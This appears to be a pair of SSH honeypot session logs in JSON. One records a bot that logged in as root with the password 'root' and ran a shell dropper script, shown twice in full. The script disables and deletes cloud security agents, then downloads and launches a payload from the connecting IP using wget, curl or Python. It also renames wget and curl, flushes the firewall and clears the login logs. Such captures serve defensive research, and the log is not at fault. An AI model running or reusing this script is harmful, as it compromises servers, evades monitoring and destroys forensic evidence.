{"id":"55002306-5e2a-40a9-8158-7871f285a5dc","name":"misty-noble-walrus","protocol":"ssh","channel_kind":"exec","src_ip":"172.82.91.35","src_port":48980,"username":"root","client_version":"SSH-2.0-PUTTY","auth_attempts":1,"automation":"bot","think_ms":null,"probe_flagged":0,"exec_command":"#!/bin/sh\n\n\nwdir=\"/tmp\"\nfor i in \"/dev/shm\" \"/tmp\" \"/var/tmp\" \"/home\" \"/root\"; do\n    touch \"$i/test_exec\" >/dev/null 2>&1\n    chmod +x \"$i/test_exec\" >/dev/null 2>&1\n    if [ -w \"$i\" ] && [ -x \"$i/test_exec\" ]; then\n        wdir=\"$i\"\n        rm -f \"$i/test_exec\"\n        break\n    fi\n    rm -f \"$i/test_exec\" >/dev/null 2>&1\ndone\ncd \"$wdir\" || exit 1\n\n\nfor svc in aegis aliyun YDService tat_agent; do\n    systemctl stop $svc >/dev/null 2>&1\n    systemctl disable $svc >/dev/null 2>&1\n    systemctl mask $svc >/dev/null 2>&1\ndone\nsystemctl daemon-reload >/dev/null 2>&1\n\nif command -v chattr >/dev/null 2>&1; then\n    chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1\n    chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1\nfi\npkill -9 AliYunDun >/dev/null 2>&1\npkill -9 YDService >/dev/null 2>&1\nrm -rf /usr/local/aegis /usr/local/qcloud >/dev/null 2>&1\n\n\ndownload_vos() {\n    local_arch=$(uname -m)\n    SERVER_IP=\"172.82.91.35\" \n    SERVER_URL=\"http://${SERVER_IP}/new.php?type=${local_arch}\"\n    target=\"new.txt\"\n    T_LIMIT=30\n\n    rm -f \"$target\" >/dev/null 2>&1\n\n\n    do_dl() {\n        # 1. wget\n        if command -v wget >/dev/null 2>&1; then\n            wget --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 2. curl\n        if command -v curl >/dev/null 2>&1; then\n            curl -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v good >/dev/null 2>&1; then\n            good --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v cool >/dev/null 2>&1; then\n            cool -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 5. python3\n        if command -v python3 >/dev/null 2>&1; then\n            python3 -c \"import urllib.request; urllib.request.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 6. python\n        if command -v python >/dev/null 2>&1; then\n            python -c \"import urllib; urllib.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        return 1\n    }\n\n\n    do_dl &\n    dl_pid=$!\n    sec=0\n    while [ $sec -lt $T_LIMIT ]; do\n        if ! kill -0 $dl_pid 2>/dev/null; then\n            wait $dl_pid\n            break\n        fi\n        sleep 1\n        sec=$((sec + 1))\n    done\n    kill -9 $dl_pid >/dev/null 2>&1\n\n\n    if [ -s \"$target\" ]; then\n        chmod +x \"$target\"\n        setsid \"./$target\" >/dev/null 2>&1 &\n        sleep 1\n        if ! pgrep -f \"$target\" >/dev/null; then\n            setsid sh \"./$target\" >/dev/null 2>&1 &\n        fi\n        return 0\n    fi\n    return 1\n}\n\ndownload_vos\n\n\nlock_tools() {\n    if command -v chattr >/dev/null 2>&1; then\n        chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1\n    fi\n    w_path=$(which wget 2>/dev/null)\n    [ -n \"$w_path\" ] && [ \"$(basename \"$w_path\")\" != \"good\" ] && mv \"$w_path\" \"$(dirname \"$w_path\")/good\" >/dev/null 2>&1\n    c_path=$(which curl 2>/dev/null)\n    [ -n \"$c_path\" ] && [ \"$(basename \"$c_path\")\" != \"cool\" ] && mv \"$c_path\" \"$(dirname \"$c_path\")/cool\" >/dev/null 2>&1\n}\nlock_tools\n\n\nsystemctl stop firewalld ufw >/dev/null 2>&1\niptables -F >/dev/null 2>&1\nfor log in /var/log/wtmp /var/log/btmp /var/log/lastlog; do [ -f \"$log\" ] && echo > \"$log\"; done\n\nsleep 2\nls -la /var/run/gcc.pid\n\n\n","started_at":"2026-08-20T07:06:45.355737+00:00","ended_at":"2026-08-20T07:06:47.226527+00:00","ended_reason":"exec complete","commands":2,"transcript_bytes":3666,"events":[{"seq":1,"at":"2026-08-20T07:06:44.969107+00:00","kind":"input","latency_ms":null,"data":"#!/bin/sh\n\n\nwdir=\"/tmp\"\nfor i in \"/dev/shm\" \"/tmp\" \"/var/tmp\" \"/home\" \"/root\"; do\n    touch \"$i/test_exec\" >/dev/null 2>&1\n    chmod +x \"$i/test_exec\" >/dev/null 2>&1\n    if [ -w \"$i\" ] && [ -x \"$i/test_exec\" ]; then\n        wdir=\"$i\"\n        rm -f \"$i/test_exec\"\n        break\n    fi\n    rm -f \"$i/test_exec\" >/dev/null 2>&1\ndone\ncd \"$wdir\" || exit 1\n\n\nfor svc in aegis aliyun YDService tat_agent; do\n    systemctl stop $svc >/dev/null 2>&1\n    systemctl disable $svc >/dev/null 2>&1\n    systemctl mask $svc >/dev/null 2>&1\ndone\nsystemctl daemon-reload >/dev/null 2>&1\n\nif command -v chattr >/dev/null 2>&1; then\n    chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1\n    chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1\nfi\npkill -9 AliYunDun >/dev/null 2>&1\npkill -9 YDService >/dev/null 2>&1\nrm -rf /usr/local/aegis /usr/local/qcloud >/dev/null 2>&1\n\n\ndownload_vos() {\n    local_arch=$(uname -m)\n    SERVER_IP=\"172.82.91.35\" \n    SERVER_URL=\"http://${SERVER_IP}/new.php?type=${local_arch}\"\n    target=\"new.txt\"\n    T_LIMIT=30\n\n    rm -f \"$target\" >/dev/null 2>&1\n\n\n    do_dl() {\n        # 1. wget\n        if command -v wget >/dev/null 2>&1; then\n            wget --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 2. curl\n        if command -v curl >/dev/null 2>&1; then\n            curl -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v good >/dev/null 2>&1; then\n            good --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v cool >/dev/null 2>&1; then\n            cool -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 5. python3\n        if command -v python3 >/dev/null 2>&1; then\n            python3 -c \"import urllib.request; urllib.request.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 6. python\n        if command -v python >/dev/null 2>&1; then\n            python -c \"import urllib; urllib.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        return 1\n    }\n\n\n    do_dl &\n    dl_pid=$!\n    sec=0\n    while [ $sec -lt $T_LIMIT ]; do\n        if ! kill -0 $dl_pid 2>/dev/null; then\n            wait $dl_pid\n            break\n        fi\n        sleep 1\n        sec=$((sec + 1))\n    done\n    kill -9 $dl_pid >/dev/null 2>&1\n\n\n    if [ -s \"$target\" ]; then\n        chmod +x \"$target\"\n        setsid \"./$target\" >/dev/null 2>&1 &\n        sleep 1\n        if ! pgrep -f \"$target\" >/dev/null; then\n            setsid sh \"./$target\" >/dev/null 2>&1 &\n        fi\n        return 0\n    fi\n    return 1\n}\n\ndownload_vos\n\n\nlock_tools() {\n    if command -v chattr >/dev/null 2>&1; then\n        chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1\n    fi\n    w_path=$(which wget 2>/dev/null)\n    [ -n \"$w_path\" ] && [ \"$(basename \"$w_path\")\" != \"good\" ] && mv \"$w_path\" \"$(dirname \"$w_path\")/good\" >/dev/null 2>&1\n    c_path=$(which curl 2>/dev/null)\n    [ -n \"$c_path\" ] && [ \"$(basename \"$c_path\")\" != \"cool\" ] && mv \"$c_path\" \"$(dirname \"$c_path\")/cool\" >/dev/null 2>&1\n}\nlock_tools\n\n\nsystemctl stop firewalld ufw >/dev/null 2>&1\niptables -F >/dev/null 2>&1\nfor log in /var/log/wtmp /var/log/btmp /var/log/lastlog; do [ -f \"$log\" ] && echo > \"$log\"; done\n\nsleep 2\nls -la /var/run/gcc.pid\n\n\n"},{"seq":2,"at":"2026-08-20T07:06:45.356360+00:00","kind":"input","latency_ms":null,"data":"ls -la /var/run/gcc.pid"},{"seq":3,"at":"2026-08-20T07:06:47.142740+00:00","kind":"output","latency_ms":1784,"data":"ls: cannot access '/var/run/gcc.pid': No such file or directory"}],"credentials":[{"username":"root","password":"root","method":"password","accepted":true,"tier":"common"}]}
{"id":"70c7cfc2-254c-4e97-a189-bc90e78f6d54","name":"electric-lucid-albatross","protocol":"ssh","channel_kind":null,"src_ip":"172.82.91.35","src_port":46666,"username":"root","client_version":"SSH-2.0-PUTTY","auth_attempts":1,"automation":"bot","think_ms":null,"probe_flagged":0,"exec_command":null,"started_at":"2026-08-20T07:06:42.574590+00:00","ended_at":"2026-08-20T07:06:43.924819+00:00","ended_reason":"no channel opened","commands":0,"transcript_bytes":0,"events":[],"credentials":[{"username":"root","password":"root","method":"password","accepted":false,"tier":"common"}]}
